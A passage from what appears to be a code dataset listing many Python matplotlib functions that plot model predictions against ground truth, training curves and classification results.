1)\n plt.imshow(img)\n plt.title(f'pred: {class_names[preds[i]]}'\n f'\\ntruth: [{class_names[targets[i]]}]')\n plt.axis('off')\n\n self.logger.experiment.add_figure(\n 'predictions', fig, global_step=self.global_step)", "def Plot_predict(X,Y,model,X_path): \n labels = {0: 'CNV', 1: 'DME', 2: 'DRUSEN', 3: 'NORMAL'}\n Y_pred_classes = np.argmax(model.predict(X),axis = 1) \n Y_true = np.argmax(Y,axis = 1)\n \n fig = plt.figure(figsize=(40, 40)) \n for i in range(X.shape[0]):\n ax = fig.add_subplot(8, 4, i + 1, xticks=[], yticks=[])\n ax.set_title(\"Groundtruth : {} \\n Prediction : {}\".format(labels[Y_true[i]],labels[Y_pred_classes[i]]), \\\n color=(\"green\" if Y_true[i] == Y_pred_classes[i] else \"red\"),fontsize=20) \n img = image.load_img(X_path[i])\n ax.imshow(img)\n plt.show()\n return", "def cross_validation_visualization(lambds, score_tr, score_te):\n plt.semilogx(lambds, score_tr, marker=\".\", color='b', label='train score');\n plt.semilogx(lambds, 
score_te, marker=\".\", color='r', label='test score');\n plt.xlabel(\"lambda\")\n plt.ylabel(\"score\")\n plt.title(\"cross validation\")\n plt.legend(loc=2)\n plt.grid(True)\n plt.savefig(\"cross_validation_test\")", "def standard_visual(pred_data_path: str, input_data_path: str):\n nb_rows = 1 if pred_dataset == 'test' else 2\n\n prediction = sitk.GetArrayFromImage(sitk.ReadImage(pred_data_path))\n input_images, ground_truth = get_input(patient_id, input_data_path)\n prediction_masked = np.ma.masked_where(prediction == 0, prediction)\n\n for i in range(prediction.shape[0]):\n fig = plt.figure(figsize=(15, 7.5))\n fig.suptitle('{}: Slice {}'.format(patient_id, i))\n\n plt.subplot(nb_rows, 1, 1)\n plt.title('Prediction')\n plt.imshow(input_images[i, ...], 'gray', interpolation=None)\n plt.imshow(prediction_masked[i, ...], 'jet', vmin=0, vmax=3, interpolation='none', alpha=0.4)\n\n if nb_rows == 2:\n plt.subplot(nb_rows, 1, 2)\n plt.title('Ground Truth')\n plt.imshow(input_images[i, ...], 'gray', interpolation=None)\n plt.imshow(ground_truth[i, ...], 'jet', vmin=0, vmax=3, interpolation='none', alpha=0.4)\n\n plt.show(block=True)", "def plot_2d(X, y_actual, y_predicted=None):\n if not y_predicted is None:\n plt.title(\"Predicted vs actual function values\")\n else:\n plt.title(\"Approximated function samples\")\n\n plt.plot(X, y_actual, 'g.', label=\"Actual values\")\n if not y_predicted is None:\n plt.plot(X, y_predicted, 'b.', label=\"Predicted values\")\n plt.show()", "def display_predictions(data, predictions):\n images = [[] for i in range(5)]\n for i, pred in enumerate(predictions):\n images[pred].append(data[i])\n cols = ['Ne', 'Mo', 'Ba', 'Eo', 'Ly']\n lengths = [len(w) for w in images]\n fig = plt.figure()\n grid = ImageGrid(fig, 111, nrows_ncols=(5, len(cols)), axes_pad=0.1,)\n for i, image_type in enumerate(images):\n for j, image in enumerate(image_type):\n if j >= 5:\n break\n grid[(len(images)*j)+i].imshow(image)\n\n pad = 5 # in points\n for ax, col in zip(grid.axes_all, cols):\n ax.annotate(col, xy=(0.5, 1), xytext=(0, pad), xycoords='axes fraction', textcoords='offset points', size='large',\n ha='center', va='baseline')\n fig.tight_layout()\n fig.subplots_adjust(left=0.15, top=0.95)\n plt.show()", "def draw_predictions(self):\n self.vis.draw_predictions()", "def display_predictions(self, x, pred, y):\r\n fig = plt.figure(figsize=(15, 15))\r\n\r\n for i in range(self.batch_size):\r\n vals = x[i, :, :, :]\r\n sub = fig.add_subplot(1, self.batch_size, i + 1)\r\n val = pred[i]\r\n val2 = y[i]\r\n res = self.classes[val]\r\n res2 = self.classes[val2]\r\n\r\n sub.set_title(\"predicted = \" + res + \"\\n\" + \"Actual = \" + res2)\r\n plt.axis('off')\r\n img = np.asarray(vals)\r\n img = np.transpose(img, (1, 2, 0))\r\n # Get Specific channels for rgb\r\n rgbimg = self.get_rgb(img, 61, 38, 19)\r\n\r\n # Normalize Inputs\r\n imgmin, imgmax = rgbimg.min(), rgbimg.max()\r\n rgbimg = (rgbimg - imgmin) / (imgmax - imgmin)\r\n plt.imshow(rgbimg)\r\n file_loc = [str(self.training_path) + '\\\\checkpoints' +\r\n '\\\\' + 'predictions.jpg']\r\n s = \"\"\r\n s = s.join(file_loc)\r\n pred_path = Path(s)\r\n plt.savefig(pred_path)\r\n plt.show()", "def plot(model, samples):\n # compute responsiblity values\n resp = model.predict_proba(samples)\n\n # plot\n plt.axis('equal')\n plt.scatter(samples[:,0], samples[:,1], c=resp)\n plt.show()", "def plotModelResults(model, X_train=X_train, X_test=X_test, plot_intervals=False, plot_anomalies=False):\n\n prediction = model.predict(X_test)\n\n 
plt.figure(figsize=(15, 7))\n\n plt.plot(prediction, \"g\", label=\"prediction\", linewidth=2.0)\n plt.plot(y_test.values, label=\"actual\", linewidth=2.0)\n plt.draw()\n if plot_intervals:\n cv = cross_val_score(model, X_train, y_train,\n cv=tscv,\n scoring=\"neg_mean_absolute_error\")\n mae = cv.mean() * (-1)\n deviation = cv.std()\n\n scale = 1.96\n lower = prediction - (mae + scale * deviation)\n upper = prediction + (mae + scale * deviation)\n\n plt.plot(lower, \"r--\", label=\"upper bond / lower bond\", alpha=0.5)\n plt.plot(upper, \"r--\", alpha=0.5)\n plt.draw()\n\n if plot_anomalies:\n anomalies = np.array([np.NaN]*len(y_test))\n anomalies[y_test<lower] = y_test[y_test<lower]\n anomalies[y_test>upper] = y_test[y_test>upper]\n plt.plot(anomalies, \"o\", markersize=10, label = \"Anomalies\")\n plt.draw()\n def mean_absolute_percentage_error(y_true, y_pred):\n return np.mean(np.abs((y_true - y_pred) / y_true)) * 100\n\n error = mean_absolute_percentage_error(prediction, y_test)\n plt.title(\"Mean absolute percentage error {0:.2f}%\".format(error))\n plt.legend(loc=\"best\")\n plt.tight_layout()\n plt.grid(True)\n plt.draw()", "def plot_policy_diff(predicted, true, walls, fig, ax):\n from matplotlib.patches import Rectangle\n\n plot_policy(walls, predicted, fig, ax)\n\n predicted = np.argmax(predicted, axis=-1)\n true = np.argmax(true, axis=-1)\n\n for i in range(len(predicted)):\n for j in range(len(predicted)):\n if predicted[i, j] != true[i, j]:\n ax.add_patch(\n Rectangle(\n (j - 0.5, i - 0.5),\n 1,\n 1,\n fill=False,\n edgecolor=\"red\",\n linewidth=1.5,\n )\n )", "def visualize(self, time, pred, true):\n plt.plot(time, true, label='Actual')\n plt.plot(time, pred, label='Predicted')\n plt.xlabel('Time')\n plt.ylabel('Price ($)')\n plt.legend(bbox_to_anchor=(0.1, 1), loc=2, borderaxespad=0.,\n prop={'size': 14})\n plt.show()", "def _plot_good_pred_whit_reject(self, test: Set, title=None, fig_size=None):\r\n if fig_size is not None:\r\n fig = plt.figure(figsize=fig_size)\r\n else:\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n goodclassified_index = []\r\n for idx_preds in range(self.preds.shape[1] - 1):\r\n new_good_index = []\r\n for idx in range(self.preds.shape[0]):\r\n if self.preds[idx][0][idx_preds] == test.labels[idx] and \\\r\n self.preds[idx][1][idx_preds] != self.preds[idx][1][idx_preds + 1]:\r\n new_good_index.append(idx)\r\n if new_good_index:\r\n ax.scatter(test.features[new_good_index, 0], self.features[new_good_index, 1],\r\n label='Good classified top{0}'.format(int(idx_preds + 1)))\r\n goodclassified_index += new_good_index\r\n new_good_index = []\r\n for idx in range(self.preds.shape[0]):\r\n if self.preds[idx][0][-1] == test.labels[idx]:\r\n new_good_index.append(idx)\r\n if new_good_index:\r\n ax.scatter(test.features[new_good_index, 0], self.features[new_good_index, 1],\r\n label='Good classified top{0}'.format(int(self.preds.shape[1])))\r\n goodclassified_index += new_good_index\r\n reject_idx, misclassified_idx = ([], [])\r\n for idx in range(self.preds.shape[0]):\r\n if idx not in goodclassified_index:\r\n reject = False\r\n for idx_preds in range(self.preds.shape[1] - 1):\r\n if self.preds[idx][1][idx_preds] == self.preds[idx][1][idx_preds + 1]:\r\n reject_idx.append(idx)\r\n reject = True\r\n break\r\n if not reject:\r\n misclassified_idx.append(idx)\r\n if reject_idx:\r\n ax.scatter(test.features[reject_idx, 0], self.features[reject_idx, 1],\r\n label='Reject', c='orange', marker='^')\r\n if misclassified_idx:\r\n 
ax.scatter(test.features[misclassified_idx, 0], self.features[misclassified_idx, 1],\r\n label='Misclassified', marker='x', c='red')\r\n box = ax.get_position()\r\n ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])\r\n # Put a legend to the right of the current axis\r\n ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\r\n if title is not None:\r\n ax.set_title(title)\r\n plt.show()", "def plot_scenario_distribution(self):\n x = self.arms\n\n y = self.df.groupby('price').mean().Converted[x]\n y_sex_0 = self.df[self.df.Sex == 0].groupby('price').mean().Converted[x]\n y_sex_1 = self.df[self.df.Sex == 1].groupby('price').mean().Converted[x]\n y_age_0 = self.df[self.df.Under_30 == 0].groupby('price').mean().Converted[x]\n y_age_1 = self.df[self.df.Under_30 == 1].groupby('price').mean().Converted[x]\n\n fig, ax_list = plt.subplots(2,1, figsize=(12, 9))\n\n for ax in ax_list:\n ax.grid(alpha=0.3, linestyle='--')\n\n ax.set_ylim(bottom=0, top=0.6)\n ax.set_xlim(left=50, right=104)\n\n ax.set_xlabel(\"Price\", fontsize=14)\n ax.set_ylabel(\"Conversion Rate\", fontsize=14)\n\n ax.set_xticks(self.arms)\n ax.set_xticklabels(self.arms.astype(np.int64), fontsize=12, alpha=0.7)\n ax.set_yticks(np.linspace(0, 0.7, 8))\n ax.set_yticklabels([str((i * 100).astype(np.int64)) + \"%\" for i in np.linspace(0, 0.7, 8)], fontsize=12, alpha=0.7)\n\n ax.spines['right'].set_alpha(0)\n ax.spines['left'].set_alpha(0.3)\n ax.spines['top'].set_alpha(0)\n ax.spines['bottom'].set_alpha(0.3)\n\n ax_list[0].plot(x, y, label='Global')\n ax_list[0].plot(x, y_sex_0, label='Male', color='moccasin')\n ax_list[0].plot(x, y_sex_1, label='Female', color='darkorange')\n\n ax_list[1].plot(x, y, label='Global')\n ax_list[1].plot(x, y_age_0, label='Under 30', color='red')\n ax_list[1].plot(x, y_age_1, label='Over 30', color='darkred')\n\n ax_list[0].legend()\n ax_list[1].legend()\n\n fig.suptitle(\"Conversion Rate\", fontsize=22)\n\n fig.show()\n\n plt.savefig('chapter5_pricing.png')", "def visualize_predictions(img, predictions, probabilities, x0, y0, windowsize):\n\n # show image\n fig = plt.figure(figsize=(12,12))\n ax = plt.subplot(111)\n plt.imshow(img)\n plt.xticks([])\n plt.yticks([])\n\n # superimpose boxes\n for i, (x,y) in enumerate(zip(x0,y0)):\n if (predictions[i] != \"other\"):\n\n # Create a Rectangle patch\n rect = patches.Rectangle((x,y), windowsize[i], windowsize[i], linewidth=2, edgecolor='r', facecolor='none')\n plt.text(x+5, y+20, predictions[i] + f'/{probabilities[i]:.2f}', fontsize=10, bbox=dict(facecolor='red', alpha=0.5, edgecolor='r'))\n\n # Add the patch to the Axes\n ax.add_patch(rect)\n\n return fig", "def main():\n Nrep = 8 # number of repetition of EM steps\n nm = 3 # number of mixed gaussians.\n ns = 300 # number of samples.\n \n mu, sg, lm, lm_ind, smp, L_true = generate_synthetic_data(nm, ns)\n plt.figure(1, figsize=(5,4))\n plt.clf()\n plot_synthetic_data(smp, mu, sg, lm, lm_ind, nm, ns)\n \n mue, sge, lme = generate_initial_state(nm, ns)\n axi = 0 # subplot number\n plt.figure(2, figsize=(12,9))\n plt.clf()\n for rep in range(Nrep):\n # E-step\n r, L_infer = e_step(smp, mue, sge, lme, nm, ns)\n axi += 1 \n ax = plt.subplot(Nrep/2, 6, axi)\n plot_em_steps(smp, r, mue, sge, lme, nm, ns)\n ax.set_title('E-step : %d' % (rep + 1))\n ax.set_yticklabels([])\n ax.set_xticklabels([])\n ax.set_ylim((-0.1, 0.3))\n\n # M-step\n mue, sge, lme = m_step(smp, r, nm, ns)\n axi += 1 \n ax = plt.subplot(Nrep/2, 6, axi)\n plot_em_steps(smp, r, mue, sge, lme, nm, ns)\n ax.set_title('M-step : %d' % (rep + 
1))\n ax.set_yticklabels([])\n ax.set_xticklabels([])\n ax.set_ylim((-0.1, 0.3))\n\n # plot the ground truth for comparison\n axi += 1 \n ax = plt.subplot(Nrep/2, 6, axi)\n plot_synthetic_data(smp, mu, sg, lm, lm_ind, nm, ns)\n ax.set_title('grn_truth')\n ax.set_yticklabels([])\n ax.set_xticklabels([])\n ax.set_ylim((-0.1, 0.3))\n\n print('L_infer = %2.6f , L_true = %2.6f' % (L_infer, L_true))", "def report(self, X, y):\n predict = self.model.predict(X)\n\n skplt.estimators.plot_feature_importances(\n self.model, x_tick_rotation=90)\n plt.show()\n\n fig, ax = plt.subplots(figsize=(7, 7))\n sns.scatterplot(x=y, y=predict)\n lims = [\n np.min([ax.get_xlim(), ax.get_ylim()]), # min of both axes\n np.max([ax.get_xlim(), ax.get_ylim()]), # max of both axes\n ]\n ax.plot(lims, lims, 'k-', alpha=0.75, zorder=0)\n ax.set_aspect('equal')\n ax.set_xlim(lims)\n ax.set_ylim(lims)\n ax.set_xlabel(\"Observed\")\n ax.set_ylabel(\"Predict\")\n ax.set_title(\"Predict vs. Observed\")\n plt.show()\n\n residuals = y - predict\n\n fig, ax = plt.subplots(figsize=(7, 7))\n sns.scatterplot(x=y, y=residuals)\n plt.title(\"Residuals vs. Observed\")\n plt.xlabel(\"Obserbed\")\n plt.ylabel(\"Residuals\")\n plt.show()\n\n plt.hist(residuals)\n plt.title(\"Residuals distribution\")\n plt.xlabel(\"Residuals value\")\n plt.ylabel(\"Count\")\n plt.show()\n\n display(\n pd.DataFrame({\n \"explained_variance_score\":\n metrics.explained_variance_score(y, predict),\n \"mean_absolute_error\":\n metrics.mean_absolute_error(y, predict),\n \"mean_squared_log_error\":\n metrics.mean_squared_log_error(y, predict),\n \"median_absolute_error\":\n metrics.median_absolute_error(y, predict),\n \"r2_score\":\n metrics.r2_score(y, predict)\n },\n index=[0]))", "def parity_plot(self, X, y, hypes='current', shuffle=True, standardize=True, test_size=0.2,\n ax=None, figsize=(5,5), lim=450, title=''):\n \n ### SPLIT + STANDARDIZE DATA ###\n X_train, X_val, y_train, y_val = \\\n model_selection.train_test_split(X, y, shuffle=shuffle, test_size=test_size)\n \n if standardize:\n std = preprocessing.StandardScaler()\n std.fit(X_train)\n X_train, X_val = std.transform(X_train), std.transform(X_val)\n \n ### FIT + PREDICT ###\n model = clone(self.estimator)\n if hypes=='current':\n model.set_params(**self.last_hypes)\n elif hypes=='best':\n model.set_params(**self.best_hypes)\n else:\n try:\n model.set_params(**hypes)\n except:\n print('Passed hypes were invalid')\n \n model.fit(X_train, y_train)\n\n ### BUILD PLOTS ###\n if ax is None:\n plt.figure(figsize=figsize)\n ax=plt.gca()\n\n for frac in ['train','val']:\n y_true = eval('y_'+frac)\n y_pred = model.predict(eval('X_'+frac))\n ax.scatter(y_true, y_pred, alpha=0.7)\n\n ax.plot((0,lim), (0,lim), linestyle='--', color='xkcd:gray')\n ax.set_aspect('equal','datalim')\n ax.set_xlim([-10,lim]); ax.set_ylim([-10,lim])\n ax.set_xlabel(r'True $\\Delta H$')\n ax.set_ylabel(r'Predicted $\\Delta H$')\n ax.legend(['y=x', 'train', 'val'])\n plt.title(title)\n\n return ax", "def visualization(epochs, mse_tr, mse_te):\n plt.semilogx(epochs, mse_tr, marker=\".\", color='b', label='train error')\n plt.semilogx(epochs, mse_te, marker=\".\", color='r', label='test error')\n plt.xlabel(\"k\")\n plt.ylabel(\"rmse\")\n plt.title(\"cross validation\")\n plt.legend(loc=2)\n plt.grid(True)\n plt.savefig(\"cross_validation\")", "def visualize_predictions(model : torch.nn.Module, dataSet : Dataset, \r\n axes, device :torch.device, numTestSamples : int,\r\n id_to_color : np.ndarray = train_id_to_color):\r\n 
model.to(device=device)\r\n model.eval()\r\n\r\n # predictions on random samples\r\n testSamples = np.random.choice(len(dataSet), numTestSamples).tolist()\r\n # _, axes = plt.subplots(numTestSamples, 3, figsize=(3*6, numTestSamples * 4))\r\n \r\n for i, sampleID in enumerate(testSamples):\r\n inputImage, gt = dataSet[sampleID]\r\n\r\n # input rgb image \r\n inputImage = inputImage.to(device)\r\n landscape = inverse_transform(inputImage).permute(1, 2, 0).cpu().detach().numpy()\r\n axes[i, 0].imshow(landscape)\r\n axes[i, 0].set_title(\"Landscape\")\r\n\r\n # groundtruth label image\r\n label_class = gt.cpu().detach().numpy()\r\n axes[i, 1].imshow(id_to_color[label_class])\r\n axes[i, 1].set_title(\"Groudtruth Label\")\r\n\r\n # predicted label image\r\n y_pred = torch.argmax(model(inputImage.unsqueeze(0)), dim=1).squeeze(0)\r\n label_class_predicted = y_pred.cpu().detach().numpy() \r\n axes[i, 2].imshow(id_to_color[label_class_predicted])\r\n axes[i, 2].set_title(\"Predicted Label\")\r\n\r\n plt.show()", "def plot_2d_results(perceptron, data):\n\n\t# Divides the data into classes.\n\ttraining_data_classes = split_into_classes(data['training_data'], data['training_labels'])\n\ttest_data_classes = split_into_classes(data['test_data'], data['test_labels'])\n\n\t# Plots the data.\n\tplt.plot(training_data_classes[0][:, 0], training_data_classes[0][:, 1], 'bo',\n\t\ttraining_data_classes[1][:, 0], training_data_classes[1][:, 1], 'ro',\n\t\ttest_data_classes[0][:, 0], test_data_classes[0][:, 1], 'b*',\n\t\ttest_data_classes[1][:, 0], test_data_classes[1][:, 1], 'r*',\n\t\tmarkersize = 12)\n\n\t# Constructs a line that represents the decision boundary.\n\tweights = perceptron.weights\n\tbias = perceptron.bias\n\tx_range = np.array([0, 100])\n\ty_range = -(x_range * weights[0] + bias) / weights[1]\n\n\t# Plots the decision boundary.\n\tplt.plot(x_range, y_range, 'k')\n\tplt.show()", "def graph_results(loss, acc):\n N = len(loss)\n x = np.linspace(0, N, N)\n plt.subplot(1,2,1)\n plt.plot(x, loss)\n plt.subplot(1,2,2)\n plt.plot(x,acc)\n plt.show()", "def regression_plots(regression_results, dependant, independant):\n\n # Scatter of two variables\n ds = xr.Dataset()\n ds['dependant'] = dependant\n ds['independant'] = regression_results[f'prediction_skt']\n ds = ds.transpose(\"y\", \"x\", \"time\")\n\n expected = ds['dependant'].values.flatten()\n predicted = ds['independant'].values.flatten()\n \n plt.style.use('stylesheets/contour.mplstyle')\n fig, ax = plt.subplots(figsize=(5, 5))\n ax.axhline(0, color='k', alpha=0.5)\n ax.axvline(0, color='k', alpha=0.5)\n mask = np.isfinite(expected) * np.isfinite(predicted)\n X = expected[mask]\n Y = predicted[mask]\n counts, xedges, yedges = np.histogram2d(X, Y, bins=100)\n xedges = (xedges[1:] + xedges[:-1]) / 2\n yedges = (yedges[1:] + yedges[:-1]) / 2\n im = ax.contourf(xedges, yedges, counts, norm=LogNorm())\n ax.set_xlabel('Expected values')\n ax.set_ylabel('Predicted values')\n # ax.autoscale(False)\n plt.colorbar(im)\n plt.show()\n\n # gradient_expected = regression[f'{dependant}'].polyfit(\n # dim='time', deg=1, cov=True).sel(degree=1).polyfit_coefficients * 1e9*60*60*24*365\n # gradient_predicted, = regression[f'prediction_{independant}'].polyfit(\n # dim='time', deg=1, cov=True).sel(degree=1).polyfit_coefficients * 1e9*60*60*24*365\n\n\n # max_ = max([gradient_expected.max().max(), gradient_predicted.max().max()])\n # min_ = min([gradient_expected.min().min(), gradient_predicted.min().min()])\n\n # divnorm = TwoSlopeNorm(vmin=min_, vcenter=0, 
vmax=max_)\n # levels = np.arange(min_, max_, 0.1)\n\n # fig = plt.figure(figsize=(5, 10))\n\n # ax = fig.add_subplot(2, 1, 1, projection=ccrs.SouthPolarStereo())\n # im = ax.contourf(gradient_expected.x, gradient_expected.y, gradient_expected.transpose(\n # ), levels=levels, norm=divnorm, cmap='RdBu_r')\n # ax.coastlines()\n # ax.set_title('Expected Trends')\n # plt.colorbar(im, ax=ax)\n\n # ax = fig.add_subplot(2, 1, 2, projection=ccrs.SouthPolarStereo())\n # im = ax.contourf(gradient_predicted.x, gradient_predicted.y,\n # gradient_predicted.transpose(), levels=levels, norm=divnorm, cmap='RdBu_r')\n # ax.coastlines()\n # ax.set_title('Predicted Trends')\n # plt.colorbar(im, ax=ax)\n pass", "def draw_predictions(ax, outputs):\n for output in outputs:\n boxes = output['box3d_lidar'].cpu().detach().numpy()\n confidences = output['scores'].cpu().detach().numpy()\n classes = output['label_preds'].cpu().detach().numpy()\n class_txts = at(class_to_name, *classes)\n for k, box3d in enumerate(boxes):\n x, y, z, w, l, h, r = box3d\n drawBoundingBoxes(ax, x, y, z, w, l, h, r, col='green', linewidth=0.8)\n ax.text(x+(w/2.0)+1, y+(l/2.0)+2, z+h, f\"{class_txts[k]}<{confidences[k]:.2f}>\", color=(0.4, 0.95, 0.3), fontsize=8.0, rotation=math.degrees(r))", "def plot_predictions(self, names=None, min_=1, max_=1000):\n \n if not names:\n names = [*self.models.keys()] + [\"test\", \"final\"]\n\n arr = range(min_, max_, int(30/self.conf[\"time_step\"]))\n\n plt.figure(figsize=(16, 7), dpi=75)\n\n for name in names:\n plt.plot(np.concatenate(self.predict.iloc[arr][name].to_numpy()), label=name)\n\n plt.title(\"Predictions\")\n plt.legend()\n plt.show()", "def plot_predictions(\n train_data, train_labels, test_data, test_labels, predictions=None\n):\n plt.figure(figsize=(10, 7))\n\n # Plot training data in blue\n plt.scatter(train_data, train_labels, c=\"b\", s=4, label=\"Training data\")\n\n # Plot test data in green\n plt.scatter(test_data, test_labels, c=\"g\", s=4, label=\"Testing data\")\n\n if predictions is not None:\n # Plot the predictions in red (predictions were made on the test data)\n plt.scatter(test_data, predictions, c=\"r\", s=4, label=\"Predictions\")\n\n # Show the legend\n plt.legend(prop={\"size\": 14})", "def display_errors(errors_index,img_errors,pred_errors, obs_errors):\n n = 0\n nrows = 3\n ncols = 3\n fig, ax = plt.subplots(nrows,ncols,sharex=True,sharey=True)\n for row in range(nrows):\n for col in range(ncols):\n error = errors_index[n]\n ax[row,col].imshow((img_errors[error]).reshape((28,28)))\n ax[row,col].set_title(\"Predicted label :{}\\nTrue label :{}\".format(pred_errors[error],obs_errors[error]))\n n += 1", "def _plot(self, step, rewards, losses):\n plt.figure(figsize=(20, 5))\n plt.subplot(131)\n plt.title('Total Episode Reward')\n plt.plot(rewards)\n plt.subplot(132)\n plt.title('MSE Loss')\n plt.plot(losses)\n plt.show()", "def plot_good_pred(self, test: Set, title=None, fig_size=None, reject=False):\r\n if reject:\r\n self._plot_good_pred_whit_reject(test, title, fig_size)\r\n else:\r\n self._plot_good_pred_whitout_reject(test, title, fig_size)", "def plot_train_test_data(train, test):\n fig = plt.figure()\n ax1 = fig.add_subplot(1, 2, 1)\n ax1.spy(train, precision=0.01, markersize=0.5)\n ax1.set_xlabel(\"Users\")\n ax1.set_ylabel(\"Items\")\n ax1.set_title(\"Training data\")\n ax2 = fig.add_subplot(1, 2, 2)\n ax2.spy(test, precision=0.01, markersize=0.5)\n ax2.set_xlabel(\"Users\")\n ax2.set_ylabel(\"Items\")\n ax2.set_title(\"Test data\")\n plt.tight_layout()\n 
plt.savefig(\"../results/train_test\")\n plt.show()", "def PlotComparison(result_values, descrete, continuous, jitter=100):\n df = result_values.copy()\n np.random.seed(0)\n df[continuous] = df[continuous] + np.random.randint(low=-jitter, high=jitter, size=len(df))\n base = alt.Chart(df).transform_calculate(\n ymin=\"datum.mean-2*datum.std\",\n ymax=\"datum.mean+2*datum.std\",\n ).properties(\n title = '[Interactive] Accuracy by Params'\n )\n \n points = base.mark_point(\n filled=True,\n size=10\n ).encode(\n x=continuous,\n y=alt.Y('mean:Q'),#, scale=alt.Scale(domain=(0.55, 0.7))),\n color=descrete,\n tooltip=['mean','std']\n )\n\n errorbars = base.mark_errorbar().encode(\n x=continuous,\n y=alt.Y(\"ymin:Q\",title='Accuracy'),\n y2=\"ymax:Q\",\n color=descrete,\n )\n\n return(points + errorbars)", "def plot(self):\n\t\traw_labels = self.make_raw_data()[1]\n\t\tbalanced_labels = self.get_extra()[1]\n\t\tfig, ax1 = subplots()\n\t\tax2 = ax1.twinx()\n\t\tx = array(range(1, NCLASSES + 1))\n\t\tl1 = ax1.bar(x - 0.3, self.prior_sizes, width = 0.25, color = 'b', align = 'center', label = 'train')\n\t\tl2 = ax2.bar(x, bincount(raw_labels - 1), width = 0.25, color = 'r', align = 'center', label = 'confident')\n\t\tl3 = ax2.bar(x + 0.3, bincount(balanced_labels - 1), width = 0.25, color = 'g', align = 'center', label = 'rebalanced')\n\t\tconfident_frac = len(raw_labels) / float(self.predictions.shape[0])\n\t\tusable_frac = len(balanced_labels) / float(self.predictions.shape[0])\n\t\tax1.set_title('at >{0:.1f}%, {1:.1f}% reliable, {2:.1f}% usable'.format(self.confidence * 100, confident_frac * 100, usable_frac * 100))\n\t\tax1.legend([l1, l2, l3], [l1.get_label(), l2.get_label(), l3.get_label()], loc = 'upper right')\n\t\tax1.set_xticks(x)", "def display_comparison(self, X_val, y_val):\n import matplotlib.pyplot as plt\n x = []\n y = []\n for model_tuple in self.model_list:\n x.append(model_tuple[1])\n y.append(model_tuple[0].score(X_val, y_val))\n plt.scatter(x, y)\n plt.show()", "def plot_observations():\n plt.plot(history.history['loss'], label='training_loss')\n plt.plot(history.history['val_loss'], label='val_loss ')\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n plt.show()\n\n plt.plot(history.history['acc'], label='accuracy')\n plt.plot(history.history['val_acc'], label='val_accuracy')\n plt.xlabel('Epoch')\n plt.ylabel('Accuracy')\n plt.legend(loc='lower right')\n plt.show()\n\n test_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\n print(\"Test Accuracy:\", test_acc)", "def plot_compare_train_test(decisions,bins,classifier, ws=None):\n low = min(np.min(d) for d in decisions)\n high = max(np.max(d) for d in decisions)\n low_high = (low,high)\n # Plot with python.\n plt.figure()\n plt.hist(decisions[0], color='b', alpha=0.5, range=low_high, bins=bins, histtype='stepfilled', density=True, label='S (train)', weights=ws[0])\n plt.hist(decisions[1], color='r', alpha=0.5, range=low_high, bins=bins, histtype='stepfilled', density=True, label='B (train)', weights=ws[1])\n hist, bins = np.histogram(decisions[2], bins=bins, range=low_high, density=True, weights=ws[2])\n center = (bins[:-1] + bins[1:]) / 2\n #scale = len(decisions[2]) / sum(hist)\n scale = sum(ws[2]) / sum(hist)\n err = np.sqrt(hist * scale) / scale\n plt.errorbar(center, hist, yerr=err, fmt='o', c='b', label='S (test)')\n hist, bins = np.histogram(decisions[3], bins=bins, range=low_high, density=True, weights=ws[3])\n #scale = len(decisions[3]) / sum(hist)\n scale = sum(ws[3]) / sum(hist)\n err = np.sqrt(hist * 
scale) / scale\n plt.errorbar(center, hist, yerr=err, fmt='o', c='r', label='B (test)')\n plt.xticks(np.arange(0, 1, step=0.1))\n plt.xlabel(\"Classifier output\")\n plt.ylabel(\"Arbitrary units\")\n plt.legend(loc='best')\n plt.savefig('plots/plt_' + classifier+'_Output.pdf',format='pdf')\n plt.show(block = False)\n return None", "def plot_prediction_grid(xx, yy, prediction_grid, filename):\n from matplotlib.colors import ListedColormap\n background_colormap = ListedColormap ([\"hotpink\",\"lightskyblue\", \"yellowgreen\"])\n observation_colormap = ListedColormap ([\"red\",\"blue\",\"green\"])\n plt.figure(figsize =(10,10))\n plt.pcolormesh(xx, yy, prediction_grid, cmap = background_colormap, alpha = 0.5)\n plt.scatter(predictors[:,0], predictors [:,1], c = outcomes, cmap = observation_colormap, s = 50)\n plt.xlabel('Variable 1'); plt.ylabel('Variable 2')\n plt.xticks(()); plt.yticks(())\n plt.xlim (np.min(xx), np.max(xx))\n plt.ylim (np.min(yy), np.max(yy))\n plt.savefig(filename)", "def plot_prediction_grid (xx, yy, prediction_grid, filename):\n from matplotlib.colors import ListedColormap\n background_colormap = ListedColormap ([\"hotpink\",\"lightskyblue\", \"yellowgreen\"])\n observation_colormap = ListedColormap ([\"red\",\"blue\",\"green\"])\n plt.figure(figsize =(10,10))\n plt.pcolormesh(xx, yy, prediction_grid, cmap = background_colormap, alpha = 0.5)\n plt.scatter(predictors[:,0], predictors [:,1], c = outcomes, cmap = observation_colormap, s = 50)\n plt.xlabel('Variable 1'); plt.ylabel('Variable 2')\n plt.xticks(()); plt.yticks(())\n plt.xlim (np.min(xx), np.max(xx))\n plt.ylim (np.min(yy), np.max(yy))\n plt.savefig(filename)", "def plot_3D_compare_list(Y_data_test_list, Y_pred_data_list, ref_shape):\n sample_len = Y_data_test_list.shape[0]\n num_classes = Y_data_test_list.max()+1\n for i in np.arange(0, sample_len):\n for c in np.arange(1, num_classes):\n fig = plt.figure()\n plt.figtext(0.1, 0.1, 'Predicted segmentation for test sample No.: ' + str(i + 1) + ', class: ' + str(c), color='white')\n true_lab = Y_data_test_list[i, ]\n true_loc = np.where(true_lab == c)\n pred_lab = Y_pred_data_list[i, ]\n pred_loc = np.where(pred_lab == c)\n\n # concurring locations\n true_copy = true_lab.copy()\n np.place(true_copy, true_copy != c, 99)\n pred_copy = pred_lab.copy()\n np.place(pred_copy, pred_copy != c, 98)\n same_loc = np.where(true_copy == pred_copy)\n\n ax = plt.axes(projection=\"3d\")\n axl = plt.gca()\n axl.set_xlim3d([0, ref_shape[0]])\n axl.set_ylim3d([0, ref_shape[1]])\n axl.set_zlim3d([0, ref_shape[2]])\n ax.scatter3D(true_loc[0], true_loc[1], true_loc[2], marker=\".\", alpha=0.2,\n edgecolor=\"dodgerblue\", facecolor=\"dodgerblue\")\n ax.scatter3D(pred_loc[0], pred_loc[1], pred_loc[2], marker=\".\", alpha=0.01,\n edgecolor=\"lightcoral\", facecolor=\"lightcoral\")\n ax.scatter3D(same_loc[0], same_loc[1], same_loc[2], marker=\".\", 